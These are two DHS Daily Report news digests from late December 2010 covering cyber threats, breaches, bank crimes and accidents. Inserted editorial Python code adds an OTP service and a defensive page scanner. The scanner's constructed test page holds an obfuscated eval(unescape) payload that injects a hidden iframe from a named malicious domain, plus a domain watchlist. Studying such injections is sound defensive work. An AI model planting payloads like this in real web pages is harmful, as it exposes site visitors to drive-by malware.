Thursday, December 30, 2010

Complete DHS Daily Report for December 30, 2010

Daily Report

Top Stories

• National Defense Magazine reports that defense companies should expect to come under non-stop attack by countries engaging in cyberespionage in 2011, experts at McAfee Labs predicted. (See items 12, 39)

12. December 28, National Defense Magazine – (National) Report: Cyber-spies to wage non-stop assaults on defense firms in 2011. Defense companies should expect to come under non-stop attack by countries engaging in cyberespionage in 2011, experts at McAfee Labs predicted. January 2010’s Operation Aurora helped coin a new term, the advanced persistent threat (APT). Aurora, believed to have originated in China, successfully infiltrated dozens of U.S. companies with the goal of stealing source codes and other data. “Companies of all sizes that have any involvement in national security or major global economic activities — even peripherally, such as a law firm advising a corporate conglomerate starting business in another country — should expect to come under pervasive and continuous APT attacks that go after email archives, document stores, intellectual property repositories, and other databases,” the report said. Source: http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=277

39. December 28, NextGov – (National) McAfee: Coming cyber threats to target mobile devices, official secrets. The biggest cyber threats in 2011 are expected to include malicious applications on mobile devices and attacks aimed at stealing government secrets and sabotaging business operations, according to McAfee. The computer security firm annually issues a list predicting what will be the biggest cyber scares during the coming year. New for 2011 is the projection that perpetrators will target social media communications on mobile devices — a means of interaction that businesses, including agencies, increasingly depend on for work. The societal shift from desk-based e-mail communications to mobile instant messaging and Twitter insta-blogging has transformed the threat landscape, the report said. McAfee anticipates attackers will hide malicious software in programs that look like legitimate applications, including federal data apps, the study’s co-author and McAfee’s vice president for threat research said in an interview. According to the threat list, “friendly fire” malware, which appears to come from contacts on social networks, will grow. The motivation of attackers also is changing, according to the study. Instead of carrying out attacks to steal money or to send a political message, some groups, including nation-states and corporations, increasingly are interested in stealing intelligence. Source: http://www.nextgov.com/nextgov/ng_20101228_6846.php?oref=topnews

• According to Detroit News, a massive furniture store explosion December 29 in Wayne, Michigan, injured several people. Consumers Energy was alerted to the smell of gas near the store before the explosion. (See item 51)

51. December 29, Detroit News – (Michigan) Owner in hospital after blast at Wayne furniture store. One person has been pulled from the rubble and two others are believed trapped inside a furniture store in Wayne, Michigan that exploded the morning of December 29, shaking area homes and frightening residents, officials said. The man rescued is the owner of the William C. Franks Furniture store. He is listed in critical condition at the University of Michigan Trauma Burn Center in Ann Arbor. Officials believe two other store employees are still missing. The massive furniture store explosion occurred after 9 a.m. near Glenwood. The gas line in the area has been shut off since 11 a.m. Consumers Energy was alerted to the smell of gas near the store before the explosion and was investigating. The city has set up an emergency warming center for residents affected by the shutoff. The store, which had been a mainstay business in this community since 1963, has been reduced to rubble. The windows of buildings next door were blown out. There also were motorists injured in vehicles nearby. Preliminary information indicates that the explosion was caused by natural gas. Officials noted that the U.S. Department of Homeland Security has joined in the investigation. Source: http://www.detnews.com/article/20101229/METRO01/12290387/1409/metro

Details

Banking and Finance Sector

13. December 29, San Diego Union-Tribune – (California) FBI on the lookout for ‘Drywaller Bandit’. A $20,000 reward is being offered for information leading to the arrest and conviction of a man authorities believe committed six bank robberies in the North County area of San Diego, California since September. Dubbed the “Drywaller Bandit” because he wore a construction dust mask in some of the thefts, the robber walks into the banks, points a black semi-automatic gun at the tellers, and demands cash, FBI officials said. He has robbed three banks in Encinitas, including a U.S. Bank and a Citibank, both of which he robbed twice, as well as a Wells Fargo, officials said. All three branches are on North El Camino Real between Leucadia Boulevard and Encinitas Boulevard. Officials also believe the same man robbed a Chase Bank on College Boulevard near state Route 76 in Oceanside. The thief is described as white and in his late 20s to early 40s, about 5 feet 8 to 5 feet 10 inches tall with a medium build, about 160 to 190 pounds and brown hair. He wears dark baseball caps, gloves, sunglasses, and a dark hooded jacket with fleece lining and jeans. He covers his face with a black ski mask or a dust mask, officials said. Source: http://www.signonsandiego.com/news/2010/dec/29/fbi-lookout-drywaller-bandit/

14. December 28, KATU 2 Portland – (Oregon) FBI: Wanted Coos Bay banker turns self in. A former bank employee accused of stealing up to $1.2 million from customers of the Wells Fargo in Coos Bay, Oregon turned herself in to the FBI around 3 p.m. December 28 in Los Angeles, California. A federal judge issued an arrest warrant for the female suspect October 27 based on charges of identity theft, aggravated identity theft, credit card fraud, wire fraud, bank fraud, and money laundering. A criminal complaint charges the suspect with stealing substantial funds from Wells Fargo during her time as a bank employee. The suspect worked at the Coos Bay Wells Fargo from August 2006 to August 2010. Source: http://www.katu.com/news/business/112547934.html

15. December 28, WBNS 10 Columbus – (Ohio) Woman questioned in ‘Church Lady’ robbery at Ohio Union. Hours after a judge released an alleged bank robber on bond, she was taken back into police custody in connection with a previous robbery. The suspect was arrested December 24, minutes after police said she robbed a Fifth Third bank at 155 W. Nationwide Blvd. in Columbus, Ohio. The suspect, 46, posted $50,000 bond December 27. She was taken into custody by Columbus police shortly after 6 p.m. and transported to the Ohio State University Police Department. The FBI said it is not releasing the suspect’s photo because it is investigating the possibility that she is connected to other robberies, including those allegedly committed by the “Church Lady Bandit,” who is believed to be responsible for robberies dating back to 2008. An OSU police officer said the woman was brought in for questioning in connection with the October robbery of a U.S. Bank at the Ohio Student Union. The FBI said it believed the robbery was the work of the “Church Lady Bandit.” The woman got the church lady nickname because a witness in 2008 told police she was dressed as if she had just come from church. Source: http://www.10tv.com/live/content/local/stories/2010/12/27/story-columbus-alleged-female-bank-robber-back-in-custody.html?sid=102

16. December 27, Bloomberg – (National) JPMorgan, Citigroup delay branch openings in U.S. Northeast after storm. JPMorgan Chase & Co. and Citigroup Inc. were among U.S. banks that closed or delayed opening most of their branches in the Northeast December 27 after a blizzard dumped more than a foot of snow on the region. Business in cities from Philadelphia to Boston ground to a crawl and travel was disrupted for a second consecutive day as airports closed and train service was interrupted or halted amid waist-high snow drifts and winds gusting to 30 mph. JPMorgan, the second-largest U.S. bank by assets, and Citigroup closed all retail branches in New Jersey where authorities declared a state of emergency and closed state offices, according to company representatives. Citigroup closed branches in Boston and planned to open some in New York and Connecticut late December 27, a company spokeswoman said. Source: http://www.bloomberg.com/news/2010-12-27/jpmorgan-citigroup-delay-branch-openings-in-u-s-northeast-after-storm.html

17. December 27, WTAM 1100 Cleveland – (Ohio) FBI investigating ATM thefts in malls. Two recent ATM thefts at Cleveland, Ohio-area malls have a lot in common. The first happened December 2 at SouthPark Mall in Strongsville. A Fifth Third stand-alone ATM was taken out at night. About 3 weeks later, a Bank of America ATM was taken out of Summit Mall in Fairlawn. The FBI has joined police in trying to find the people responsible. An FBI spokesman in Cleveland thinks more than one person was involved because of the size of the ATMs. They do not know how the thieves got into the malls because, in both cases, there were no signs of a break-in. Since the cases are similar, the FBI believes the same people may be responsible for both crimes. Source: http://www.wtam.com/cc-common/news/sections/newsarticle.html?feed=122520&article=7978806

Information Technology

46. December 29, Softpedia – (International) New drive-by download attack exploits recently patched IE flaw. Security researchers from Trend Micro have intercepted a new drive-by download attack which exploits a critical Internet Explorer vulnerability to install multiple malware components on targeted systems. Drive-by download attacks are a common and effective malware propagation method and are usually launched from legitimate Web sites that have been compromised. They involve exploiting vulnerabilities in outdated versions of popular applications like Adobe Reader, Flash Player, Java, Internet Explorer, Firefox or the operating system itself, in order to silently infect computers. The exploit used in this case is detected as JS_SHELLCOD.SMGU by Trend Micro products and targets an IE vulnerability patched in Microsoft’s MS10-090 security bulletin released December 14. This bulletin is rated as critical and addresses seven vulnerabilities in Internet Explorer. Trend Micro does not mention which one is targeted in the attack, but the most likely candidate is CVE-2010-3962. CVE-2010-3962 is an uninitialized memory corruption vulnerability, which affects all supported IE versions (6, 7, and 8) and has been actively exploited in the wild since its discovery in November. Source: http://news.softpedia.com/news/New-Drive-By-Download-Attack-Exploits-Recently-Patched-IE-Flaw-175183.shtml

47. December 29, Bloomberg – (International) Apple sued over applications giving information to advertisers. Apple Inc., maker of the iPhone and iPad, was accused in a lawsuit of allowing applications for those devices to transmit users’ personal information to advertising networks without customers’ consent. The complaint, which seeks class action, or group, status, was filed December 23 in federal court in San Jose, California. The suit claims Cupertino, California-based Apple’s iPhones and iPads are encoded with identifying devices that allow advertising networks to track what applications users download, how frequently they are used, and for how long. Apple iPhones and iPads are set with a Unique Device Identifier, or UDID, which cannot be blocked by users, according to the complaint. Apple claims it reviews all applications on its App Store and does not allow them to transmit user data without customer permission, according to the complaint. Source: http://www.businessweek.com/news/2010-12-29/apple-sued-over-applications-giving-information-to-advertisers.html

48. December 28, IDG News Service – (International) Mozilla site exposed encrypted passwords. A database of inactive Mozilla usernames and passwords was exposed on the Internet in early December, the Mozilla Foundation disclosed December 28. The database, which contained 44,000 inactive user accounts for the addons.mozilla.org site, was inadvertently placed on a public-facing Web server, wrote the Mozilla director of infrastructure security. He stressed the exposure “posed minimal risk to users.” The organization erased all the passwords, which were encrypted. It also accounted for every download of the database. Current users of addons.mozilla.org are not affected, because the organization upgraded its procedure for encrypting passwords in April 2009, he stated. Mozilla security officials were first notified of the exposure December 17 through the organization’s Web bounty program, which allows volunteers to submit security-related bugs. Source: http://www.computerworld.com/s/article/9202658/Mozilla_site_exposed_encrypted_passwords

For more stories, see items 11 and 49 below

11. December 29, Tech Herald – (National) Attackers walk with 4.9 million customer records in Honda breach. American Honda Motor Company recently discovered that 2.2 million customers were impacted by a data breach exposing the Owner Link e-mail list maintained by outsourced vendor Silverpop. In addition, a further 2.7 million records were lost when the My Acura list was hit. In a letter to customers, American Honda Motor Company said it recently became aware of “unauthorized access to an e-mail list used by a vendor to create a welcome e-mail to customers who have an Owner Link or My Acura vehicle account.” The Owner Link e-mail list contained customer names, email addresses, user names, and Vehicle Identification Numbers. The compromised My Acura list only contained e-mail addresses. Source: http://www.thetechherald.com/article.php/201052/6623/Attackers-walk-with-4-9-million-customer-records-in-Honda-breach

Communications Sector

49. December 29, The H Security – (International) 27C3 presentation claims many mobiles vulnerable to SMS attacks. According to security experts, an “SMS of death” threatens to disable many current Sony Ericsson, Samsung, Motorola, Micromax, and LG mobiles. In a presentation given to the 27th Chaos Communication Congress (27C3) in Berlin December 27, security researchers at TU Berlin claimed sending malicious text or MMS messages represents a relatively simple means of crashing current mobile phones. Some of the bugs discovered have the potential to cause problems for entire mobile networks. In recent months, the tendency has been for hackers and security testers to focus their efforts on smartphones such as the iPhone or Android-based phones. However, only 16 percent of mobile phone users possess sophisticated handsets of this type. One of the researchers suggests the possibility of targeted attacks on the entire mobile network infrastructure by, for example, causing “ten thousand mobiles to try to reconnect simultaneously.” An attack could also be concentrated on users of a specific brand of mobile. To prevent such occurrences, he called for phone manufacturers to provide more security updates and to simplify the dissemination of updates. Source: http://www.h-online.com/security/news/item/27C3-presentation-claims-many-mobiles-vulnerable-to-SMS-attacks-1159568.html

For more stories, see item 47 above in the Information Technology Sector

Wednesday, December 29, 2010

Complete DHS Daily Report for December 29, 2010

Daily Report

Top Stories

• The U.S. Embassy in London was a target of a group of men arrested in Britain and charged with conspiracy to cause explosions and preparing acts of terrorism, according to Reuters. (See item 39)

39. December 28, Reuters – (International) U.S. says embassy was target of attack. The U.S. Embassy in London was a target of a group of men arrested last week in Britain and charged with conspiracy to cause explosions and preparing acts of terrorism, the U.S. State Department said December 27. Twelve men were arrested December 20 in what British police said were counter-terrorism raids essential to protect the public from the threat of attack. Three were later released without charges, leaving nine who appeared in court December 27 to face the charges. The suspects were from London, the Welsh capital of Cardiff, and the central English city of Stoke. A British police statement said the men had conspired to cause “explosions of a nature likely to endanger life or cause serious injury to property.” It added they had been downloading material from the Internet, researching and discussing potential targets, carrying out reconnaissance, and “igniting and testing incendiary material.” The police statement did not specify what the potential targets were. Source: http://www.thepeterboroughexaminer.com/ArticleDisplay.aspx?e=2906963

• CNN reports more than 200 people were trapped and several others were injured when a ski lift broke down at Sugarloaf Ski Resort in Kingfield, Maine, causing several lift riders to fall to the ground. (See item 55)

55. December 28, CNN – (Maine) Ski lift malfunction injures several at Maine resort. More than 200 people were trapped and several others were injured December 28 when a ski lift broke down at Sugarloaf Ski Resort in Kingfield, Maine, causing several lift riders to fall to the ground, a resort manager said. A spokesman for the resort said the derailment on one tower of the Spillway East lift happened around 10:30 a.m. when the lift’s cable skipped over the edge of a pulley. Five of the lift’s chairs fell 25 to 30 feet and hit the ground, he said. He later told CNN the rescue operation was complete around noon. Franklin Memorial Hospital in Farmington, Maine, received three patients and was expecting four more, according to a spokeswoman. Another patient was brought in by ambulance, but was transferred to Maine Medical Center in Portland by helicopter, he said. A CNN employee who initially was trapped on the lift said he saw skiers fall from the lift when it came to an abrupt stop during high winds. High winds were gusting between 30 mph and 50 mph in the area at the time, according to a CNN meteorologist. There were an estimated 220 people on the more than 100 chairs on the lift, and the process of evacuating everyone from the chairs dangling above the resort was under way the afternoon of December 28. Sugarloaf has never had a lift derailment of this nature in its 60-year history. The cause of the accident was under investigation. Source: http://www.cnn.com/2010/US/12/28/maine.skiers.trapped/?hpt=T1

Details

Banking and Finance Sector

15. December 28, HedgeCo.Net – (Utah: International) Hedge fund manager indicted in $30 million international fraud scheme. A Utah hedge fund manager has been arraigned on multiple counts of mail fraud, wire fraud, and conspiracy, relating to his operation of a Utah-based hedge fund company, “Coadum Capital.” The suspect was indicted December 15, along with an alleged accomplice. “This indictment alleges a major international investment fraud scheme that defrauded over 100 victims around the country out of tens of millions of dollars, most of which was transferred to overseas accounts,” a prosecutor said. Coadum attracted more than $30 million in investments in 2006 and 2007. Coadum offered shares in hedge funds and advertised monthly returns of 5 percent. The indictment alleged money placed in escrow was transferred to accounts in Switzerland and the Mediterranean island of Malta, from where it then disappeared. The indictment said investors lost approximately $30 million. The charges carry a maximum sentence of 20 years in prison and a fine of up to $250,000 each. Source: http://www.hedgeco.net/news/12/2010/hedge-fund-manager-indicted-in-30-million-international-fraud-scheme.html

16. December 28, Softpedia – (International) Anonymous attacks Bank of America. Anonymous has launched a distributed denial of service attack (DDoS) against Bank of America (BoA), after the U.S.-based financial giant banned transactions destined for WikiLeaks. About 2 weeks ago, BoA joined the list of companies boycotting WikiLeaks by announcing it would block all transactions related to the whistleblower organization. All of the firms became targets of coordinated DDoS attacks by Anonymous, a notorious group of hacktivists. The holiday delayed the attack, but it launched December 27. However, as some previously predicted, a lack of organization failed to cause major problems for Bank of America. Infosec Island reported the primary impediment was technical issues with the “hive mind” feature of the LOIC DDoS tool, which normally forces the user’s computer to join a voluntary botnet. Users had to resort to filling in the target details manually and not all of them managed to do it. Even so, the BoA Web site experienced slowdowns and even went offline for short periods of time. The force of the attacks is expected to increase as the hive mind problem gets resolved and more members return from the Christmas holiday to join the effort. Source: http://news.softpedia.com/news/Anonymous-Cell-Attacks-Bank-of-America-174930.shtml

17. December 28, Associated Press – (National) Former Chicagoan accused of $8M investment fraud. Federal prosecutors have charged a former Chicago, Illinois man with swindling nearly $8 million from more than 50 victims who were led to believe they were buying specially discounted stock in a number of well-known companies, including Google Inc., and Facebook Inc. The U.S. Attorney’s office in Chicago said the 39-year-old suspect, now of Newton, Massachusetts, was charged December 27 with one count of wire fraud, and one count of filing a false federal income tax return. The office said the suspect will be arraigned at a later date, and did not say whether he had an attorney. A spokesman for the U.S. Attorney’s office said the suspect styled himself as a self-employed securities trader while running the alleged swindle from locations in Chicago, Seattle, Boston, and Newton. Source: http://www.bloomberg.com/news/2010-12-28/former-chicagoan-accused-of-8m-investment-fraud.html

18. December 27, Press Trust of India – (International) Banks to add extra security layer for phone banking. Banks will ask for an additional password from credit card customers from the new year for any transactions conducted over phone, subsequent to a Reserve Bank of India (RBI) direction for making phone banking more secure. According to the RBI guidelines, banks must decline any telephonic banking transactions, including the automated IVR (Interactive Voice Response) services, where the customers do not have a one-time password (OTP) for such services with effect from January 1, 2011. Each OTP will be valid for a single use and will remain in effect for 2 hours. Customers will have to generate a separate OTP for each IVR transaction. The new step has been taken as a safeguard against credit card frauds. There has been an uptick in frauds involving lost or stolen cards. For transactions where cards are needed to be presented physically, RBI has already made it mandatory for an identity verification, and the signature also must match the one on the card. The added security layer for phone banking follows a similar step taken by banks for Internet banking transactions. Banks like Citibank and HDFC Bank have already told their customers to get OTP for phone banking transactions, while others are in the process of doing so. According to banking sector experts, customers who do not get an OTP before January 1 will be prompted to get one whenever they initiate a phone banking transaction. Source: http://www.business-standard.com/india/news/banks-to-add-extra-security-layer-for-phone-banking/419654/
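The item above describes the rules an OTP service for IVR transactions has to enforce: no OTP means the transaction is declined, each OTP is single-use, it expires after 2 hours, and a separate OTP is needed per transaction. The following is an added illustration of those rules in Python; it is not code from any bank, RBI or the article, and its 6-digit code length, 3-attempt limit and HMAC-based storage are this editor's assumptions, not requirements stated in the report.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

OTP_TTL_SECONDS = 2 * 60 * 60  # the report: an OTP remains in effect for 2 hours
OTP_DIGITS = 6                 # assumption: the report does not state the code length
MAX_ATTEMPTS = 3               # assumption: lockout so a 6-digit code cannot be guessed online


@dataclass
class _Issued:
    digest: bytes      # keyed hash of the code; the plaintext OTP is never stored
    issued_at: float   # seconds since epoch, injected by the caller for testability
    used: bool = False
    attempts: int = 0


class PhoneBankingOtp:
    """Issues one OTP per (card, transaction) pair and accepts each OTP at most once."""

    def __init__(self, secret_key: bytes):
        self._key = secret_key
        self._issued: dict[tuple[str, str], _Issued] = {}

    def _digest(self, card_ref: str, txn_id: str, code: str) -> bytes:
        # Binding card and transaction into the hash means a code issued for one
        # IVR transaction cannot be replayed against another.
        msg = f"{card_ref}:{txn_id}:{code}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).digest()

    def issue(self, card_ref: str, txn_id: str, now: float) -> str:
        code = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self._issued[(card_ref, txn_id)] = _Issued(self._digest(card_ref, txn_id, code), now)
        return code  # delivered to the customer out of band (e.g. SMS) in a real deployment

    def authorize(self, card_ref: str, txn_id: str, code: str, now: float) -> str:
        key = (card_ref, txn_id)
        rec = self._issued.get(key)
        if rec is None:
            return "declined: no OTP issued for this transaction"
        if rec.used:
            return "declined: OTP already used"
        if now - rec.issued_at > OTP_TTL_SECONDS:
            del self._issued[key]
            return "declined: OTP expired"
        if not hmac.compare_digest(rec.digest, self._digest(card_ref, txn_id, code)):
            rec.attempts += 1
            if rec.attempts >= MAX_ATTEMPTS:
                del self._issued[key]
                return "declined: too many attempts"
            return "declined: OTP mismatch"
        rec.used = True
        return "approved"


if __name__ == "__main__":
    # Constructed walk-through with a demo key and a fixed clock.
    svc = PhoneBankingOtp(b"constructed-demo-key")
    code = svc.issue("card-1234", "txn-A", now=0)
    print(svc.authorize("card-1234", "txn-A", code, now=60))      # approved
    print(svc.authorize("card-1234", "txn-A", code, now=120))     # declined: OTP already used
    print(svc.authorize("card-1234", "txn-B", code, now=120))     # declined: no OTP issued for this transaction
```

The clock is passed in rather than read from `time.time()` so the 2-hour expiry can be exercised deterministically; the verify path deletes exhausted or expired records so the store does not grow without bound.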

19. December 27, Softpedia – (International) Santander exposes bank statements of over 22,000 customers. Late during the week of December 20-24, Santander’s United Kingdom branch announced a data breach where bank statements of 22,600 customers were sent to the wrong recipients. According to a bank spokesperson, the incident was the result of a printing equipment error at a third-party company paid to send the statements. “With the bank statement, the first page contains the name and address, the account number and sort code. This was correct,” a Santander spokesperson told eWEEK. The bank will send out corrected statements and will notify all affected customers about the potential privacy breach, but stressed the risk of fraud is very small. The organization has alerted the Financial Services Authority, and the Information Commissioner’s Office also launched its own probe. The printing equipment was reset after producing 35,000 statements. Source: http://news.softpedia.com/news/Santander-Exposes-Bank-Statements-of-Over-22-000-Customers-174670.shtml

20. December 27, BankInfoSecurity.com – (National) Fraud 2011: Beware cross-channel threats. Fraud in all its forms will continue to strike banking institutions across all channels in 2011. And until banks and credit unions increase investments in analytics and channel integration, they will continue to suffer losses. That’s the overall message from the Faces of Fraud: Fighting Back survey, whose results were released in an Executive Summary by Information Security Media Group. The survey, which includes responses from more than 230 financial leaders and security officers at financial organizations of all sizes, reveals keen insights into the fraud landscape. The study found credit and debit card fraud ranks No. 1 among current forms of fraud, with 81 percent of respondents saying they were impacted by payment card incidents this year. Check fraud came in second, with 63 percent saying it remains a problem. Phishing and vishing-related fraud was third, getting 48 percent of respondent votes. But only 20 percent of respondents said they are prepared to fight and prevent phishing and vishing attacks. The survey also found cross-channel fraud detection is not being widely implemented, with 55 percent saying they continue to rely on manual techniques. Only 26 percent have a plan or team in place for cross-channel detection; and 63 percent said they either have no cross-channel plan or team, are working on a plan or team, or simply do not know. The study indicated 76 percent of respondents first learn of fraud incidents only when customers and members notify them. To reduce vulnerability to fraud, 63 percent said they improved customer and employee awareness through education, 40 percent said they invested in new technology and 17 percent have increased budgets and/or staff. In 2011, 34 percent of respondents will increase budgetary investments and/or personnel to improve fraud prevention. Source: http://www.bankinfosecurity.com/articles.php?art_id=3206

21. December 24, La Jolla Patch – (Colorado; California) ‘Ho-Hum Bandit’ may be robbing Colorado banks. After a 5-month bank robbery spree, the “Ho-Hum Bandit” seemed to just disappear from Southern California. It now appears as though he may have moved on to a new market. Investigators said a serial bank robber who is wanted in Colorado matches the description of the Ho-Hum Bandit, who hit up 12 banks, including the Citibank in La Jolla, from late February through July. In Colorado, the robber was given a different moniker—the “JV Bandit Gone Bad,” according to an FBI Special Agent. The JV Bandit is wanted for 8 robberies in Boulder, Denver, and Fort Collins. “Just like here, he’s going every two or three weeks,” the FBI Special Agent said. The bandit is described as a white male in his 30s. He is approximately 5 foot 9 and 160 to 170 pounds. The FBI said he is fair-skinned and usually wears some type of hat, faded jeans, and white sneakers. Source: http://lajolla.patch.com/articles/ho-hum-bandit-may-be-robbing-colorado-banks

Information Technology

47. December 28, Softpedia – (International) Trojan distributed in new mass injection attack via Java downloader. Security researchers warn a new mass injection attack is underway directing the visitors of hundreds of Web sites to a malicious Java applet which downloads a Trojan. According to the creator of the Unmask Parasites Web scanner, the malicious code is added at the end of HTML pages on compromised Web sites and takes the form of an obfuscated JavaScript function. When parsed by the browser, this function adds a rogue IFrame to the HTML document, which loads a new(dot)htm page from aubreyserr(dot)com, medien-verlag(dot)de or yennicq(dot)be. According to statistics from Google’s Safe Browsing service, around 2,000 Web sites link to these domains, giving a rough estimation of the attack’s impact so far. The page called by the IFrame loads a Hidden.jar applet deceptively titled “Java Update.” This is a Java OpenConnection-type downloader whose only purpose is to download and execute a file called host.exe. Source: http://news.softpedia.com/news/Trojan-Distributed-in-New-Mass-Injection-Attack-via-Java-Downloader-174971.shtml
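The item above gives a defender three static indicators for pages hit by this injection: script code appended after the closing HTML tag, JavaScript that assembles an IFrame out of encoded strings, and references to the three named domains. The scanner below is an added example written for this digest, not code from Unmask Parasites, Google Safe Browsing or the article; its obfuscation token list and the sample pages are constructed by the editor, and the domains are kept defanged as the report writes them and only refanged inside the script for matching.

```python
import re
from urllib.parse import unquote

# Second-stage hosts named in the report, defanged as written there; refanged
# only in memory so the scanner can match them in page content.
WATCHLIST_DEFANGED = ["aubreyserr(dot)com", "medien-verlag(dot)de", "yennicq(dot)be"]
WATCHLIST = [d.replace("(dot)", ".") for d in WATCHLIST_DEFANGED]

# Tokens commonly seen in obfuscated injected JavaScript (editor's heuristic, an assumption).
OBFUSCATION_TOKENS = ("eval(", "unescape(", "fromCharCode", "document.write(")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def _decode_layers(text: str) -> str:
    """Percent-decode and expand \\xNN escapes so an encoded hostname or tag becomes visible."""
    decoded = unquote(text)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), decoded)


def scan_page(html: str) -> list:
    """Return a list of indicator labels found in one page's HTML (empty list = nothing found)."""
    findings = []
    lower = html.lower()

    # 1. The report says the injected code is appended at the end of the page:
    #    a <script> after the final </html> is itself suspicious.
    end = lower.rfind("</html>")
    if end != -1 and "<script" in lower[end:]:
        findings.append("script-after-html-close")

    # 2. Inspect every script body after peeling off one encoding layer.
    for script in SCRIPT_RE.findall(html):
        raw = script.lower()
        decoded = _decode_layers(script).lower()
        hits = [t for t in OBFUSCATION_TOKENS if t.lower() in raw]
        if hits and ("%" in script or "\\x" in script):
            findings.append("obfuscated-script:" + ",".join(hits))
        for host in WATCHLIST:
            if host in decoded:
                findings.append("watchlist-host:" + host)
        # An <iframe> that only exists once the string is decoded is the pattern the report describes.
        if "<iframe" in decoded and "<iframe" not in raw:
            findings.append("hidden-iframe-in-encoded-string")

    # 3. Watchlist hosts in plain markup too (a static iframe, or the applet page itself).
    for host in WATCHLIST:
        label = "watchlist-host:" + host
        if host in lower and label not in findings:
            findings.append(label)
    return findings


# Constructed samples: a clean page, and the same page with an appended obfuscated
# script that writes an iframe pointing at one of the named hosts.
CLEAN_PAGE = "<html><head><title>Shop</title></head><body><p>Welcome</p></body></html>\n"
INJECTED_PAGE = CLEAN_PAGE + (
    '<script>eval(unescape("document.write(%22%3Ciframe%20src%3D%22http%3A//aubreyserr.com/new.htm'
    '%22%20width%3D1%20height%3D1%3E%3C/iframe%3E%22)"))</script>'
)

if __name__ == "__main__":
    print("clean   :", scan_page(CLEAN_PAGE))      # []
    print("injected:", scan_page(INJECTED_PAGE))   # four indicators, including the watchlist host
```

Running this over a crawl of one's own site catches the appended-script variant the report describes; it does not execute the JavaScript, so a sample that builds its strings at runtime rather than with escapes would need a dynamic check as well.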

48. December 28, The New New Internet – (International) Texas-based whistle-blower site attacked. A Texas-based Web designer who runs idontgiveascam(dot)com — a whistle-blower site aimed at exposing online business scams — said a DDoS attack caused him an estimated $10,000 in damages and revenue loss, according to San Antonio Express-News. He said a California-based company hosts the server for his site, and it could not stop the week-long attack. After recovering from the first cyber attack, he found a message on his site from a poster named USA, RUSSIA, GERMAN HACKERZ that read, “please close this site i give you 2 Days, when you don t close this site, i must take my botnet und we attack you again. i say that here not for funny !!!” “Some of the people on there became agitated that their business is being affected by the site,” he told San Antonio Express-News. “So they hacked the site before and they had threatened to attack.” A clue to the culprit’s identity was detected after a suspected attacker posted a comment on the site. The IP address led to Russia. Source: http://www.thenewnewinternet.com/2010/12/23/texas-based-whistle-blower-site-attacked/

49. December 28, Help Net Security – (International) Geolocation, mobile devices and Apple top the list of emerging threats. McAfee unveiled its 2011 Threat Predictions report, outlining the top threats that researchers at McAfee Labs foresee for the coming year. The list comprises 2010’s most buzzed about platforms and services, including Android, iPhone, foursquare, Google TV, and the Mac OS X platform, which are all expected to become major targets for cybercriminals. McAfee also predicts that politically motivated attacks will be on the rise, as more groups are expected to repeat the WikiLeaks paradigm. The report outlines the following top threats: Exploiting Social Media: URL-shortening services; Exploiting Social Media: Geolocation services; Mobile: Usage is rising in the workplace, and so will attacks; Apple: No longer flying under the radar; Applications: Privacy leaks — from your TV; Sophistication Mimics Legitimacy: Your next computer virus could be from a friend; Botnets: The new face of Mergers and Acquisitions; Hacktivism: Following the WikiLeaks path; Advanced Persistent Threats: A whole new category. Source: http://www.net-security.org/secworld.php?id=10374

50. December 27, eWeek – (International) Tuesday most active day for malware distributors, says SonicWALL. After analyzing the malware and online threats of 2010, SonicWALL security researchers said they found that Tuesday was the most threat-heavy day of the week. Monday was a close second for threat-related traffic, SonicWALL’s vice-president of e-mail security told eWEEK. It was not clear from the analysis why malware activity was the highest on Tuesdays, but he speculated a connection with Microsoft’s Patch Tuesday announcements. SonicWALL researchers noticed this pattern for China, India, Mexico, South Africa, Taiwan, Turkey, the United States, and several European countries. The researchers also found the most active time for threat-related traffic in the United States was between 10 a.m. and 11 a.m. Pacific time. According to the analysis, Trojans tend to peak in September and December, corresponding with the proliferation of back-to-school offers and holiday greeting cards. However, there was also a “second wave” of threats, as attackers send follow-up scams in January, when bills come due. Source: http://www.eweek.com/c/a/Security/Tuesday-Most-Active-Day-for-Malware-Distributors-Says-SonicWALL-535925/

51. December 24, ITProPortal – (International) Facebook blocked j.mp URLs over spam fears. Facebook temporarily blocked all j.mp shortened URL links on its platform owing to spam and malware issues. The social networking platform decided to take action after it discovered that more than 70 percent of j.mp links redirected users to spam and other malicious Web sites. The company said in a statement that: “As part of our effort to keep Facebook and the people who use our service secure, we closely monitor the content shared on the site for spam and malicious content.” Facebook also said it was working with j.mp parent company Bit.ly in order to resolve the issue. According to TechCrunch, links shortened by j.mp are once again accessible from the platform. Source: http://www.itproportal.com/2010/12/24/facebook-blocked-jmp-urls-over-spam-fears/

Communications Sector

52. December 28, City News Service – (California) SoCal storms damage AT&T system. The recent heavy rainfall in Southern California damaged the telephone system to the point of creating a “natural disaster,” leaving residential and business customers throughout the region without a dial tone, an AT&T spokeswoman said December 27. “We have technicians out there, working around the clock to restore service,” she said. She could not estimate the number of service outages in Riverside or neighboring counties, but said the breadth of the damage had prompted the company to redeploy technicians from Northern to Southern California over the past several days. A spokesman with Verizon California — another major local exchange carrier — said a “significant number” of storm-related repair calls had come in, and the company had crews “working night and day” to restore phone service. He predicted it would take about 2 weeks to fix all the storm-related problems. AT&T customers have lost voice and DSL access, preventing any communication — except by mobile phone. Source: http://www.mydesert.com/article/20101228/NEWS01/12280317/1006/NEWS01/SoCal+storms+damage+AT&T+system

